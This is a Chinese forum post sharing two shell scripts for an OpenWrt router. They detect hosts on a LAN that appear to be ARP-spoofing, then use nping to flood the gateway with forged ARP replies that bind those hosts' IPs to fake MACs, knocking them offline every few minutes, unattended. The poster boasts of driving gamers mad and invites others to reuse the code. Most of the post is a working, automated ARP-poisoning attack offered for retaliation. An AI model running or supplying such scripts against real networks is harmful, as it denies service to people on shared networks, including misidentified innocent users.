本帖最后由 null666666 于 2023-3-16 13:06 编辑
shell脚本,局域网arp攻击狗实在蛋疼,arptables防火墙只能防止向下欺骗,没法保证这些人攻击网关,所以我给旧路由(极路由1s) 刷了openwrt,用screen 运行了自己写的反攻脚本!
无人值守,自动攻击,对方几分钟断网一次,对于打游戏的那帮人,估计快疯了,横行嚣张局域网1年了,这会儿丫估计快尿了!不建议不懂shell的用,要安装好些软件,ip-full,arptables,nping....
我把代码放上来,懂得拿去改改用,懒得注释!
1.主脚本,用于收集arp攻击设备ip,去重,然后调用子脚本多线程攻击
- #!/bin/sh
- mac_spc() {
- local i=$(awk 'BEGIN{srand();printf int((2355*rand())+1)}')
- local f=$(cat macf6e.txt | sed -n "${i}p")
- local s=$(echo '0123456789ABCDEF' | awk '{srand(); for (i = 1; i <= 6; i++){printf substr($0,int((16*rand())+1),1)}}')
- local l=":${s:0:2}:${s:2:2}:"
- echo $f$l
- }
- rnd_num() {
- echo $(awk 'BEGIN{srand();printf int((4*rand())+1)}')
- return 0
- }
- wd=$(ifconfig wlan0 | grep 'inet addr:' | awk -F '[: ]+' '{print $4}' | awk 'BEGIN{FS=".";OFS="."}{print $1,$2,$3}')
- gw_ip="${wd}.1"
- gw_mac=$(cat /proc/net/arp | grep -w "${gw_ip}" | awk '{print $4}')
- ipx=$(ifconfig wlan0 | grep 'inet addr:' | awk -F '[: ]+' '{print $4}')
- js=0
- res=""
- lst=""
- chs=5
- while getopts ':i' OPT; do
- case $OPT in
- i) $OPTARG + 10 &>/dev/null && chs=$OPTARG ;;
- esac
- done
- while true; do
- arping -DI wlan0 ${gw_ip} &>/dev/null
- sleep 1s
- >attc220806_file
- {
- tcpdump -qnei wlan0 arp net ${wd} and not host ${gw_ip} and dst host ${ipx} -l | awk -F '[, ]+' '{print $9}' >>attc220806_file
- } &>/dev/null &
- sleep 60s
- killall 'tcpdump'
- >attc220806_res
- sort -u attc220806_file | grep -v "^$" >attc220806_res
- if [ -s './attc220806_res' ]; then
- let js++
- fmacc=$(mac_spc)
- j=10
- if [ $js -gt $chs ]; then
- js=0
- cat /root/attc220806_alst /root/attc220806_res | sort -n | uniq -u >/root/attc220806_grd
- lst="/root/attc220806_grd"
- else
- lst="/root/attc220806_res"
- fi
- while read i; do
- let j++
- macc="${fmacc}$j"
- {
- ./ntt2.sh 6 100 "${gw_ip}" "${gw_mac}" "${i}" "${macc}"
- } &>/dev/null &
- done <${lst}
- wait
- res="table: ${lst}, $(date +%Y'-'%m'-'%d' '%H':'%M':'%S)"
- echo -e "${res}" | tee -a /root/libfl/attc220806log
- cat ${lst} >>/root/libfl/attc220806log
- else
- echo -e "attc220806_res empty!... $(date +%Y'-'%m'-'%d' '%H':'%M':'%S)" | tee -a /root/libfl/attc220806log
- fi
- sleep $(rnd_num)m
- done
复制代码
2.子脚本ntt2.sh,用于调用nping 刷网关缓存,把对方的ip刷到一个不存在的mac,让对方无法上网
- #!/bin/sh
- mac_rnd() {
- local i=$(awk 'BEGIN{srand();printf int((2355*rand())+1)}')
- local f=$(cat /root/macf6e.txt | sed -n "${i}p")
- local s=$(echo '0123456789ABCDEF' | awk '{srand(); for (i = 1; i <= 6; i++){printf substr($0,int((16*rand())+1),1)}}')
- local l=":${s:0:2}:${s:2:2}:${s:4:2}"
- echo $f$l
- return 0
- }
- ctt=$1
- ktt=$2
- gtw_ip=$3
- gtw_mac=$4
- fwip=$5
- fmac=$6
- # echo "nping --arp --arp-type arp-reply --arp-target-mac $gtw_mac --arp-target-ip $gtw_ip --arp-sender-ip $fwip --arp-sender-mac $fmac -c 1 $gtw_ip"
- tmp_fifo="./$$.fifo"
- mkfifo "${tmp_fifo}"
- exec 6<>"${tmp_fifo}"
- rm -rf "${tmp_fifo}"
- for i in $(seq 1 $ctt); do
- echo
- done >&6
- for j in $(seq 1 $ktt); do
- read -u6
- {
- nping --arp --arp-type arp-reply --arp-target-mac $gtw_mac --arp-target-ip $gtw_ip --arp-sender-ip $fwip --arp-sender-mac $fmac -c 1 $gtw_ip
- echo >&6
- } &>/dev/null &
- done
- wait
- exec 6<&-
- exec 6>&-
- exit 0
复制代码
3.效果大概如下图,用另一台openwrt 路由tcpdump 抓的arp包
请不要胡乱输入以及粘贴、复制等方式灌水
请尊重作者、并共同维护网站的正常阅读,否则账户将会被限制发帖、回帖,站内短信以及阅读权限等都会受到影响,谢谢。
具体限制方式:https://www.right.com.cn/forum/thread-8307840-1-1.html
|